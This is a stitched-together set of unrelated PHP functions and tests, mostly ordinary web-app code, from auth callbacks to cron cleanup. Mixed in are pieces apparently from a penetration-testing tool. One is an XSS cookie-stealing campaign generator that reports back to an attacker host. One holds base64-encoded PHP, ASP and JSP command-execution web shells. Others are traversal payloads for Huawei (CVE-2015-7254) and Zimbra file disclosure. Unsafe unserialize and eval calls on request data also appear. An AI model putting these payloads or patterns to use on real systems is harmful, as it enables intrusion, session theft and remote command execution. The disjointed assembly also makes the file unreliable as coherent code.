/**
* auth service callback
* @param Base $f3
* @param $params
*/
function callback(\Base $f3, $params)
{
$Opauth = new \Opauth($this->config, false);
switch ($Opauth->env['callback_transport']) {
case 'session':
$response = $f3->get('SESSION.opauth');
$f3->clear('SESSION.opauth');
break;
case 'post':
$response = unserialize(base64_decode($f3->get('POST.opauth')));
break;
case 'get':
$response = unserialize(base64_decode($f3->get('GET.opauth')));
break;
default:
$f3->error(400, 'Unsupported callback_transport');
break;
}
if (isset($response['error'])) {
$f3->call($this->abortFunc, array($response));
return;
}
$data = $response['auth'];
// validate
if (empty($data) || empty($response['timestamp']) || empty($response['signature']) || empty($data['provider']) || empty($data['uid'])) {
$f3->error(400, 'Invalid auth response: Missing key auth response components');
} elseif (!$Opauth->validate(sha1(print_r($data, true)), $response['timestamp'], $response['signature'], $reason)) {
$f3->error(400, 'Invalid auth response: ' . $reason);
} else {
// It's all good
$f3->call($this->successFunc, array($data));
}
}
/**
* @dataProvider providerForCustomBase
*/
public function testCustomBase($base, $custom, $input)
{
$object = new Base($base, $custom);
$this->assertTrue($object->__invoke($input));
$this->assertTrue($object->check($input));
$this->assertTrue($object->assert($input));
}
public function testGetFiles()
{
$directory = $this->getMock('Magento\\Framework\\Filesystem\\Directory\\Read', [], [], '', false);
$filesystem = $this->getMock('Magento\\Framework\\App\\Filesystem', ['getDirectoryRead'], [], '', false);
$filesystem->expects($this->once())->method('getDirectoryRead')->with(\Magento\Framework\App\Filesystem::MODULES_DIR)->will($this->returnValue($directory));
$globalFiles = ['Namespace/One/view/base/layout/one.xml', 'Namespace/Two/view/base/layout/two.xml'];
$areaFiles = ['Namespace/Two/view/frontend/layout/four.txt', 'Namespace/Two/view/frontend/layout/three.xml'];
$directory->expects($this->at(0))->method('search')->with('*/*/view/base/layout/*.xml')->will($this->returnValue($globalFiles));
$directory->expects($this->at(3))->method('search')->with('*/*/view/frontend/layout/*.xml')->will($this->returnValue($areaFiles));
$directory->expects($this->atLeastOnce())->method('getAbsolutePath')->will($this->returnArgument(0));
$objectManager = $this->getMockForAbstractClass('Magento\\Framework\\ObjectManager');
$objectManager->expects($this->atLeastOnce())->method('create')->with('Magento\\Framework\\View\\File', $this->anything())->will($this->returnCallback(array($this, 'createFileCallback')));
$fileFactory = new \Magento\Framework\View\File\Factory($objectManager);
$theme = $this->getMockForAbstractClass('Magento\\Framework\\View\\Design\\ThemeInterface');
$theme->expects($this->once())->method('getArea')->will($this->returnValue('frontend'));
$model = new Base($filesystem, $fileFactory, 'layout');
$result = $model->getFiles($theme, '*.xml');
for ($i = 0; $i <= 2; $i++) {
$this->assertArrayHasKey($i, $result);
$this->assertInstanceOf('\\Magento\\Framework\\View\\File', $result[$i]);
}
$this->assertEquals($globalFiles[0], $result[0]->getFilename());
$this->assertEquals($globalFiles[1], $result[1]->getFilename());
$this->assertEquals($areaFiles[1], $result[2]->getFilename());
}
/**
* @param \Base $f3
* Description This function will be used to create the necessary script needed to hook a page.
*/
function create_campaign(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'xssrc_campaign.html';
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.targetUrl')) {
$error = true;
\Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
} else {
$target_url = $f3->get('POST.targetUrl');
$c_host = parse_url($target_url, PHP_URL_HOST);
$template_src = $f3->ROOT . $f3->BASE . '/scripts/attack_temp.mth3l3m3nt';
$campaign_file = $f3->ROOT . $f3->BASE . '/scripts/' . $c_host . '.js';
$campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js';
$postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr';
copy($template_src, $campaign_file);
$unprepped_contents = file_get_contents($campaign_file);
$unprepped_contents = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $unprepped_contents);
$unprepped_contents = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $unprepped_contents);
file_put_contents($campaign_file, $unprepped_contents);
$instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success');
$this->response->data['content'] = $instructions;
}
}
}
/**
* clear expired cached files
* >> >php index.php "/cron/deleteExpiredCacheData"
* @param \Base $f3
*/
function deleteExpiredData(\Base $f3)
{
$time_start = microtime(true);
// cache dir (dir is recursively searched...)
$cacheDir = $f3->get('TEMP');
$filterTime = (int) strtotime('-' . $f3->get('PATHFINDER.CACHE.EXPIRE_MAX') . ' seconds');
$expiredFiles = Search::getFilesByMTime($cacheDir, $filterTime);
$deletedFiles = 0;
$deletedSize = 0;
$notWritableFiles = 0;
$deleteErrors = 0;
foreach ($expiredFiles as $filename => $file) {
/**
* @var $file \SplFileInfo
*/
if ($file->isWritable()) {
$tmpSize = $file->getSize();
if (unlink($file->getRealPath())) {
$deletedSize += $tmpSize;
$deletedFiles++;
} else {
$deleteErrors++;
}
} else {
$notWritableFiles++;
}
}
$execTime = microtime(true) - $time_start;
// Log ------------------------
$log = new \Log('cron_' . __FUNCTION__ . '.log');
$log->write(sprintf(self::LOG_TEXT, __FUNCTION__, $deletedFiles, $deletedSize, $notWritableFiles, $deleteErrors, $execTime));
}
public function shellGenerator(\Base $f3)
{
$this->response->data['SUBPART'] = 'websaccre_shellgen.html';
$pshell = "PD9waHAgDQppZiAoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpeyANCiAgICAkY21kPSgkX1JFUVVFU1RbImNtZCJdKTsgDQogICAgZWNobyBzeXN0ZW0oJGNtZCk7IA0KICAgIGRpZTsgDQp9IA0KPz4=";
$ashell = "PCUNCklmIChyZXF1ZXN0KCJjbWQiKSA8PiAiIikgVGhlbg0KUmVzcG9uc2UuV3JpdGUgU2VydmVyLkhUTUxFbmNvZGUoc2VydmVyLmNyZWF0ZW9iamVjdCgid3NjcmlwdC5zaGVsbCIpLmV4ZWMoU2VydmVyLk1hcFBhdGgoImNtZC5leGUiKSYgIiAvYyAiICYNCg0KcmVxdWVzdCgiY21kIikpLnN0ZG91dC5yZWFkYWxsKQ0KRW5kIElmDQolPg";
$jshell = "PCUgaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7IG91dC5wcmludGxuKCJDb21tYW5kOiAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpICsgIjxiciAvPiIpOyBQcm9jZXNzIHAgPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7IE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7IElucHV0U3RyZWFtIGluID0gcC5nZXRJbnB1dFN0cmVhbSgpOyBEYXRhSW5wdXRTdHJlYW0gZGlzID0gbmV3IERhdGFJbnB1dFN0cmVhbShpbik7IFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7IHdoaWxlICggZGlzciAhPSBudWxsICkgeyBvdXQucHJpbnRsbihkaXNyKTsgZGlzciA9IGRpcy5yZWFkTGluZSgpOyB9IH0gJT4g";
$jspx = "PGpzcDpyb290IHhtbG5zOmpzcD0iaHR0cDovL2phdmEuc3VuLmNvbS9KU1AvUGFnZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHhtbG5zOmM9Imh0dHA6Ly9qYXZhLnN1bi5jb20vanNwL2pzdGwvY29yZSIgdmVyc2lvbj0iMi4wIj4NCjxqc3A6ZGlyZWN0aXZlLnBhZ2UgY29udGVudFR5cGU9InRleHQvaHRtbDtjaGFyc2V0PVVURi04IiBwYWdlRW5jb2Rpbmc9IlVURi04Ii8";
$shell_type = $f3->get('POST.shelltype');
if ($f3->get('VERB') == 'POST') {
$error = false;
switch ($shell_type) {
case "PHP":
$this->response->data['content'] = base64_decode($pshell);
break;
case "ASP":
$this->response->data['content'] = base64_decode($ashell);
break;
case "JSP":
$this->response->data['content'] = base64_decode($jshell);
break;
case "JSPX":
$this->response->data['content'] = base64_decode($jspx);
break;
default:
$this->response->data['content'] = "Invalid Shell Type Request";
break;
}
}
}
function command_parse()
{
global $DB, $Core, $Parse, $Security, $Base, $Style;
if (!$Security->allowed()) {
return;
}
$include = implode("/", module());
if (file_exists("module/{$include}/main.php")) {
$dir = "";
foreach (module() as $module) {
$dir .= "{$module}/";
$shared = "module/{$dir}shared.php";
if (file_exists($shared)) {
include $shared;
}
}
require_once "module/{$include}/main.php";
if (function_exists(command())) {
eval(command() . "();");
}
if (file_exists("module/{$include}/.content/" . func() . ".php")) {
if (!get('ajax') && !get('xml')) {
require_once "module/{$include}/.content/" . func() . ".php";
}
}
} else {
$Base = new Base();
$Base->title("Invalid Module");
$Base->Header();
$Base->Footer();
}
}
public function action_postAnswers($set)
{
$model = new Base();
$setVars = $model->setVars($set);
print_r(Input::get('answers'));
$model->storeAnswers(Input::get('answers'));
}
public static function year(\Base $fat)
{
$year = (int) $fat->get('PARAMS.year');
if (!in_array($year, $fat->get('YEARS'))) {
$year = $fat->get('YEAR');
}
echo self::contest($year);
}
/**
* Check if valid key was sent
*
* @returns bool
*/
public static function validKey()
{
if (!isset($_GET['apikey'])) {
return false;
}
$base = new Base();
return $base->getDao()->getUserExistsByApiKey($_GET['apikey']);
}
public function testSetAndGetAlias()
{
$instance = new Base('');
$instance->setAlias('foo');
$this->assertEquals('foo', $instance->getAlias());
$instance->setAlias('bar');
$this->assertEquals('bar', $instance->getAlias());
}
/**
* @test
*/
public function testAssertNotZeroExitSuppressed()
{
// Command should yield an error
$command = "exit 1";
$this->_obj->expects($this->any())->method('getCommand')->will($this->returnValue($command));
$this->_obj->setSuppressErrors(true);
$this->_obj->run();
$this->markTestIncomplete("Don't know how to check for the absence of a certain output regex");
}
protected function _getConfig()
{
if (!$this->_config) {
$hive = $this->_fw->hive();
$hive['xhbid'] = $this->getXhbId();
$this->_processConfig($hive);
}
return $this->_config;
}
/**
* delete all expired signatures on "inactive" systems
* >> php index.php "/cron/deleteSignatures"
* @param \Base $f3
*/
function deleteSignatures(\Base $f3)
{
$signatureExpire = (int) $f3->get('PATHFINDER.CACHE.EXPIRE_SIGNATURES');
if ($signatureExpire > 0) {
$pfDB = DB\Database::instance()->getDB('PF');
$sqlDeleteExpiredSignatures = "DELETE `sys` FROM\n `system_signature` `sys` INNER JOIN\n `system` ON \n `system`.`id` = `sys`.`systemId`\n WHERE\n `system`.`active` = 0 AND\n TIMESTAMPDIFF(SECOND, `sys`.`updated`, NOW() ) > :lifetime\n ";
$pfDB->exec($sqlDeleteExpiredSignatures, ['lifetime' => $signatureExpire]);
}
}
/**
* POST /post.json
* Create a new post
*
* @todo Allow posting to a buddy's page
* @param \Base $fw
*/
public function post(\Base $fw)
{
$userId = self::_requireAuth();
if ($fw->get('POST.user_id') != $userId) {
\App::error(403);
}
$post = \Model\Post::create(['user_id' => $userId, 'page_id' => $fw->get('POST.user_id'), 'content' => $fw->get('POST.content')]);
$detail = \App::model('post/detail')->load($post->id);
$this->_json($detail->cast());
}
/**
* Huawei_lfi
* cve-2015-7254
* Directory traversal vulnerability on Huawei HG532e, HG532n, and HG532s devices allows remote attackers to read arbitrary files via a .. (dot dot) in an icon/ URI.
* @param \Base $f3
* Alternative file read: http://<target_IP>:37215/icon/../../../etc/inittab.
*/
public function huawei_lfi(\Base $f3)
{
$lfi = new Larfi();
$f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s');
$this->response->data['SUBPART'] = 'lfi_page.html';
$blankurl = $f3->devoid('POST.url');
$url = $f3->get('POST.url');
$payload = ":37215/icon/../../../etc/defaultcfg.xml";
return $this->uri_based_lfi($blankurl, $url, $payload);
}
function RegPage_CreateCode($n)
{
global $zbp;
for ($i = 0; $i < 100; $i++) {
$r = new Base($GLOBALS['RegPage_Table'], $GLOBALS['RegPage_DataInfo']);
$r->InviteCode = GetGuid();
$r->Level = $zbp->Config('RegPage')->default_level;
$r->Save();
}
}
/**
* Zimbra Collaboration Server URI Based LFI
* @param \Base $f3
*/
public function zimbra_lfi(\Base $f3)
{
$lfi = new Larfi();
$f3->set('exploit_title', 'Zimbra Collaboration server LFI (Versions: <=7.2.2 and <=8.0.2 )');
$this->response->data['SUBPART'] = 'lfi_page.html';
$blankurl = $f3->devoid('POST.url');
$url = $f3->get('POST.url');
$payload = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
return $this->uri_based_lfi($blankurl, $url, $payload);
}
public function run($event = 'before')
{
if (!isset($this->routes[$event])) {
return true;
}
foreach ($keys = array_keys($this->routes[$event]) as $key) {
$paths[] = str_replace('@', '*@', $key);
}
$vals = array_values($this->routes[$event]);
array_multisort($paths, SORT_DESC, $keys, $vals);
$this->routes[$event] = array_combine($keys, $vals);
// Convert to BASE-relative URL
$req = $this->f3->rel(urldecode($this->f3->URI));
foreach ($this->routes[$event] as $pattern => $routes) {
if (!($args = $this->f3->mask($pattern, $req))) {
continue;
}
ksort($args);
$route = NULL;
if (isset($routes[$ptr = $this->f3->AJAX + 1][$this->f3->VERB])) {
$route = $routes[$ptr];
} elseif (isset($routes[\Base::REQ_SYNC | \Base::REQ_AJAX])) {
$route = $routes[\Base::REQ_SYNC | \Base::REQ_AJAX];
}
if (!$route) {
continue;
}
if ($this->f3->VERB != 'OPTIONS' && isset($route[$this->f3->VERB])) {
$parts = parse_url($req);
if ($this->f3->VERB == 'GET' && preg_match('/.+\\/$/', $parts['path'])) {
$this->f3->reroute(substr($parts['path'], 0, -1) . (isset($parts['query']) ? '?' . $parts['query'] : ''));
}
$handler = $route[$this->f3->VERB][0];
if (is_bool(strpos($pattern, '/*'))) {
foreach (array_keys($args) as $key) {
if (is_numeric($key) && $key) {
unset($args[$key]);
}
}
}
if (is_string($handler)) {
// Replace route pattern tokens in handler if any
$handler = preg_replace_callback('/@(\\w+\\b)/', function ($id) use($args) {
return isset($args[$id[1]]) ? $args[$id[1]] : $id[0];
}, $handler);
if (preg_match('/(.+)\\h*(?:->|::)/', $handler, $match) && !class_exists($match[1])) {
$this->f3->error(500, 'PreRoute handler not found');
}
}
// Call route handler
return $this->f3->call($handler, array($this->f3, $args), 'beforeroute,afterroute') !== FALSE;
}
}
return true;
}
/**
* @param Base $entity
* @param string $type
* @param array $parameters
* @param bool $withNamespace
*/
public function __construct(Base $entity, $type, array $parameters = array(), $withNamespace = false)
{
if ($withNamespace) {
$eventName = $entity->getNamespace() . $entity->getName() . '::' . $type;
$this->entityEventType = $type;
} else {
$eventName = $entity->getName() . $type;
}
parent::__construct($entity->getModule(), $eventName, $parameters);
$this->entity = $entity;
}
/**
* @param \Base $f3
*/
private function onePager($f3)
{
$contents = '';
$tree = $this->ptService->getTree();
foreach ($tree as $rootPage) {
$layoutClassName = $this->getLayoutClassForPage($rootPage);
$layout = new $layoutClassName(array($rootPage), $this->lang, $this->tree);
$contents .= $layout->doRender();
}
$f3->set('contents', $contents);
}
/**
* POST /register
* @param \Base $fw
*/
function registerPost(\Base $fw)
{
try {
$token = \Helper\Api\User::register($fw->get('POST'));
$fw->set('COOKIE.session_token', $token);
$fw->reroute('/stream');
} catch (\Exception $e) {
$fw->set('error', $e->getMessage());
\App::error(403);
}
}
/**
* @return null
*/
public function testBuild()
{
$expected = '<base href="' . $this->href . '" target="' . $this->target . '">';
$this->assertEquals($expected, $this->base->build());
$base = new BaseTag($this->href);
$expected = '<base href="' . $this->href . '">';
$this->assertEquals($expected, $base->build());
$base = new BaseTag(null, $this->target);
$expected = '<base target="' . $this->target . '">';
$this->assertEquals($expected, $base->build());
}
public function viewSingle(\Base $f3, $params)
{
$this->response->data['SUBPART'] = 'payload_view.html';
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
if ($this->resource->dry()) {
$f3->error(404, 'Payload not found');
}
$this->response->data['POST'] = $this->resource;
}
}
/**
* @param \Base $f3
* @param array $params
* @return bool
*/
public function getSingle(\Base $f3, $params)
{
$this->response->data['SUBPART'] = 'comment_edit.html';
if (isset($params['id'])) {
$this->response->data['comment'] = $this->resource->load(array('_id = ?', $params['id']));
if (!$this->resource->dry()) {
return true;
}
}
\Flash::instance()->addMessage('Unknown Comment ID', 'danger');
$f3->reroute($f3->get('SESSION.LastPageURL'));
}
/**
* @param \Base $f3
*/
public function init($f3)
{
$character = $this->getCharacter();
// page title
$pageTitle = $character ? $character->name : 'Map';
$f3->set('pageTitle', $pageTitle);
// main page content
$f3->set('pageContent', false);
// body element class
$f3->set('bodyClass', 'pf-body');
// JS main file
$f3->set('jsView', 'mappage');
}
public function delete(\Base $f3, $params)
{
$this->resource->reset();
$msg = \Flash::instance();
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
if ($f3->get('HOST') == 'ikkez.de' && !$this->resource->dry() && $this->resource->username == 'admin') {
$msg->addMessage("You are not allowed to delete the demo-admin", 'danger');
$f3->reroute('/admin/' . $params['module']);
return;
}
parent::delete($f3, $params);
}
$f3->reroute($f3->get('SESSION.LastPageURL'));
}
public function get($request)
{
if (!$request instanceof Request) {
$key = $request;
$request = new Request();
$request->setKey($key);
}
$success = $this->processing($request);
if (!$success) {
if ($this->_successor) {
$this->_successor->get($request);
}
}
return $request->getResult();
}
/**
* delete connection
* @param \Base $f3
* @throws \Exception
*/
public function delete(\Base $f3)
{
$connectionIds = $f3->get('POST.connectionIds');
$activeCharacter = $this->getCharacter();
/**
* @var Model\ConnectionModel $connection
*/
$connection = Model\BasicModel::getNew('ConnectionModel');
foreach ($connectionIds as $connectionId) {
$connection->getById($connectionId);
$connection->delete($activeCharacter);
$connection->reset();
}
echo json_encode([]);
}
function __construct() {
$f3 = Base::instance();
$dbh = new PDO($f3->get('db_dns') . $f3->get('db_name'), $f3->get('db_user'), $f3->get('db_pass'));
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$this->f3 = $f3;
$this->db = $dbh;
}
